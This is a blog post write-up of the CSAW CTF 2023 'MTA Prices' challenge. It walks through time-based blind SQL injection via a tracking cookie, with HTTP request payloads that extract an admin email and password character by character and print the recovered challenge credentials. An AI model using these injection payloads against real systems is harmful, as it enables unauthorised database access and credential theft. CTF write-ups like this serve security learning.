<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="MTA Prices Time-based SQli  How to identifyYou can leverage the trackID in the cookie to manipulate the session content, which the server sends back in the response header. Also, modifying the trackID">
<meta property="og:type" content="article">
<meta property="og:title" content="CSAW CTF 2023-Writeup">
<meta property="og:url" content="https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/index.html">
<meta property="og:site_name" content="Zhong&#39;s Blog">
<meta property="og:description" content="MTA Prices Time-based SQli  How to identifyYou can leverage the trackID in the cookie to manipulate the session content, which the server sends back in the response header. Also, modifying the trackID">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-dcfcaf77c3e0c7483838aa34d2b5bfef.png">
<meta property="og:image" content="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-5427e8f851f0891eb0fb679d9ddae823.png">
<meta property="og:image" content="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-26eab2848c1a5e25ca88e0f7fbf4a59d.png">
<meta property="og:image" content="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-0cf51a4f002f680bbc21430613de9582.png">
<meta property="og:image" content="https://api.2h0ng.wiki/noteimages/2023/09/18/01-06-02-59382736bafdc07265d1f28add506c0f.png">
<meta property="article:published_time" content="2023-09-16T21:24:33.000Z">
<meta property="article:modified_time" content="2024-01-21T23:32:32.078Z">
<meta property="article:author" content="2h0ng, Zhong">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-dcfcaf77c3e0c7483838aa34d2b5bfef.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>CSAW CTF 2023-Writeup</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-JRNNF9TMHE"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-JRNNF9TMHE');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.1.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/superboy-zjc">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/12/10/Compiler-Optimization/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/09/09/PatriotCTF-2023/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&text=CSAW CTF 2023-Writeup"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&is_video=false&description=CSAW CTF 2023-Writeup"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CSAW CTF 2023-Writeup&body=Check out this article: https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&name=CSAW CTF 2023-Writeup&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&t=CSAW CTF 2023-Writeup"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#MTA-Prices"><span class="toc-number">1.</span> <span class="toc-text">MTA Prices</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#How-to-identify"><span class="toc-number">1.1.</span> <span class="toc-text">How to identify</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Proof-of-Concept"><span class="toc-number">1.2.</span> <span class="toc-text">Proof of Concept</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">1.3.</span> <span class="toc-text">Exploitation</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reference"><span class="toc-number">2.</span> <span class="toc-text">Reference</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        CSAW CTF 2023-Writeup
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">2h0ng, Zhong</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-09-16T21:24:33.000Z" class="dt-published" itemprop="datePublished">2023-09-16</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ctf/" rel="tag">ctf</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="MTA-Prices"><a href="#MTA-Prices" class="headerlink" title="MTA Prices"></a>MTA Prices</h1><blockquote>
<p>Time-based SQli</p>
</blockquote>
<h2 id="How-to-identify"><a href="#How-to-identify" class="headerlink" title="How to identify"></a>How to identify</h2><p>You can leverage the <code>trackID</code> in the cookie to manipulate the <strong>session</strong> content, which the server sends back in the response header.</p>
<p>Also, modifying the <code>trackID</code> to an unintended value causes the email field in the <strong>session</strong> to display an “<strong>Error</strong>“ message.</p>
<p>Importantly, this presents an opportunity to manipulate user input to create anomalies.</p>
<p><img src="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-dcfcaf77c3e0c7483838aa34d2b5bfef.png" alt="Untitled"></p>
<p><img src="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-5427e8f851f0891eb0fb679d9ddae823.png" alt="Untitled"></p>
<h2 id="Proof-of-Concept"><a href="#Proof-of-Concept" class="headerlink" title="Proof of Concept"></a>Proof of Concept</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/<span class="number">1.1</span></span><br><span class="line">Host: web.csaw.io:<span class="number">5800</span></span><br><span class="line">Cookie: trackingID=lAApPkDuBk<span class="string">&#x27;+sleep(5)+&#x27;</span>O4Fp2KuGsB;</span><br><span class="line">Connection: keep-alive</span><br></pre></td></tr></table></figure>

<p>The email showing no error means the SQL commands have been successfully executed.</p>
<p><img src="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-26eab2848c1a5e25ca88e0f7fbf4a59d.png" alt="Untitled"></p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Replace <a target="_blank" rel="noopener" href="https://github.com/superboy-zjc/CTF-Writeups/blob/main/CSAW%202023/1-20.list">ARG1</a> and <a target="_blank" rel="noopener" href="https://github.com/superboy-zjc/CTF-Writeups/blob/main/CSAW%202023/allprintable.list">ARG2</a> with your dictionaries…</p>
<blockquote>
<p>ARG1: Numbers ranging from 0 to 20 </p>
<p>ARG2: All printable characters, ASCII 32 to 126</p>
</blockquote>
<p><strong>Get admin’s email:</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/<span class="number">1.1</span></span><br><span class="line">Host: web.csaw.io:<span class="number">5800</span></span><br><span class="line">Cookie: trackingID=lAApPkDuBkO4Fp2KuGsB<span class="string">&#x27;+(SELECT IF((select SUBSTRING(email,$&#123;ARG1&#125;,1) from users where privilege LIKE &#x27;</span>admin%<span class="string">&#x27; limit 0,1)=binary(&#x27;</span>$&#123;ARG2&#125;<span class="string">&#x27;),SLEEP(10),&#x27;</span>a<span class="string">&#x27;))+&#x27;</span>;</span><br><span class="line">Connection: keep-alive</span><br></pre></td></tr></table></figure>

<p><strong>Get admin’s password:</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/<span class="number">1.1</span></span><br><span class="line">Host: web.csaw.io:<span class="number">5800</span></span><br><span class="line">Cookie: trackingID=lAApPkDuBkO4Fp2KuGsB<span class="string">&#x27;+(SELECT IF((select SUBSTRING(password,$&#123;ARG1&#125;,1) from users where email=&#x27;</span>emily.brown@mta.com<span class="string">&#x27; limit 0,1)=binary(&#x27;</span>$&#123;ARG2&#125;<span class="string">&#x27;),SLEEP(1),&#x27;</span>a<span class="string">&#x27;))+&#x27;</span>;</span><br><span class="line">Connection: keep-alive</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://api.2h0ng.wiki/noteimages/2023/09/18/01-02-43-0cf51a4f002f680bbc21430613de9582.png" alt="Untitled"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mail - &gt; emily.brown@mta.com</span><br><span class="line">password -&gt; p<span class="comment">#2r@5ml8q7v!9x$1</span></span><br></pre></td></tr></table></figure>

<p><img src="https://api.2h0ng.wiki/noteimages/2023/09/18/01-06-02-59382736bafdc07265d1f28add506c0f.png" alt="Untitled"></p>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a target="_blank" rel="noopener" href="https://www.kirsle.net/wizards/flask-session.cgi">https://www.kirsle.net/wizards/flask-session.cgi</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md#extract-database-with-information_schema">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md#extract-database-with-information_schema</a></p>
<p><a target="_blank" rel="noopener" href="https://superboy-zjc.github.io/2020/08/05/%E9%98%B6%E6%AE%B5%E5%9B%9B%E3%80%81Web%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/7%E3%80%81SQL%E6%B3%A8%E5%85%A5/#%E4%BA%8C%E3%80%81SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E6%B3%A8%E5%85%A5%E7%82%B9">https://superboy-zjc.github.io/2020/08/05/阶段四、Web渗透测试/7、SQL注入/#二、SQL注入的注入点</a></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/superboy-zjc">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#MTA-Prices"><span class="toc-number">1.</span> <span class="toc-text">MTA Prices</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#How-to-identify"><span class="toc-number">1.1.</span> <span class="toc-text">How to identify</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Proof-of-Concept"><span class="toc-number">1.2.</span> <span class="toc-text">Proof of Concept</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">1.3.</span> <span class="toc-text">Exploitation</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reference"><span class="toc-number">2.</span> <span class="toc-text">Reference</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&text=CSAW CTF 2023-Writeup"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&is_video=false&description=CSAW CTF 2023-Writeup"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CSAW CTF 2023-Writeup&body=Check out this article: https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&title=CSAW CTF 2023-Writeup"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&name=CSAW CTF 2023-Writeup&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.2h0ng.wiki/2023/09/16/CSAW-2023/&t=CSAW CTF 2023-Writeup"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    2h0ng, Zhong
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/superboy-zjc">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'zhong-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
